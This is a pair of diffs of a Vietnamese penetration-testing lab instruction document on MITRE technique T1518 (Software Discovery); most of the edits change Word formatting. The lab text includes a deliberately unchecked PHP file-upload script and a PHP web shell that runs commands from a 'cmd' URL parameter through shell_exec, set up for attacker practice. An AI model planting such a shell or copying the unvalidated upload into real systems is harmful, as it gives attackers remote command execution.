--- a/pen_attk_mitre-t1518/instruction.docx
+++ b/pen_attk_mitre-t1518/instruction.docx
@@ -523,6 +523,7 @@
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rStyle w:val="Emphasis"/>
           <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
@@ -976,7 +977,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t> (attacker):</w:t>
+        <w:t> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1127,7 +1146,7 @@
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:color w:val="1F1F1F"/>
           <w:sz w:val="26"/>
@@ -2247,6 +2266,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/pen_attk_mitre-t1518/instruction.docx
+++ b/pen_attk_mitre-t1518/instruction.docx
@@ -21,29 +21,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>T</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>1518 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Software Discovery I</w:t>
+        <w:t>T1518 : Software Discovery I</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -156,62 +134,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:t>Nội dung thực hành</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>File</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>imodule: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>https://github.com/DUNG1604/pen_attk_mitre_t1518/raw/refs/heads/main/imodule.tar</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -474,29 +396,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>sudo chown -R www-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>data:www</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>-data /var/www/html/uploads</w:t>
+        <w:t>sudo chown -R www-data:www-data /var/www/html/uploads</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -616,210 +516,128 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>if (isset($_FILES['file']</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>)) {</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>    $file_name = $_FILES['file</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>'][</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>'name'</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>];</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>    $file_tmp = $_FILES['file</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>'][</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>'tmp_name'</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>];</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>    move_uploaded_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>file(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>$file_tmp, "uploads/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>" .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $file_name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>    echo "File uploaded successfully!</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>";</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>if (isset($_FILES['file'])) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>    $file_name = $_FILES['file']['name'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>    $file_tmp = $_FILES['file']['tmp_name'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>    move_uploaded_file($file_tmp, "uploads/" . $file_name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>    echo "File uploaded successfully!";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -839,46 +657,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>&lt;form action="" method="post" enctype="multipart/form-data"&gt;</w:t>
       </w:r>
     </w:p>
@@ -1221,84 +999,28 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>if (isset($_GET['cmd']</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>)) {</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>    echo "&lt;pre&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>" .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> shell_exec($_GET['cmd']</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>) .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "&lt;/pre&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>";</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>if (isset($_GET['cmd'])) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>    echo "&lt;pre&gt;" . shell_exec($_GET['cmd']) . "&lt;/pre&gt;";</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1536,47 +1258,47 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:t>Khi bài lab kết thúc, một tệp zip lưu kết quả được tạo và lưu vào một vị trí được hiển thị bên dưới stoplab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Khởi động lại bài lab:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F1F1F"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Khi bài lab kết thúc, một tệp zip lưu kết quả được tạo và lưu vào một vị trí được hiển thị bên dưới stoplab.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Khởi động lại bài lab:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="1F1F1F"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
         <w:t>Trong quá trình làm bài sinh viên cần thực hiện lại bài lab, dùng câu lệnh:</w:t>
       </w:r>
     </w:p>
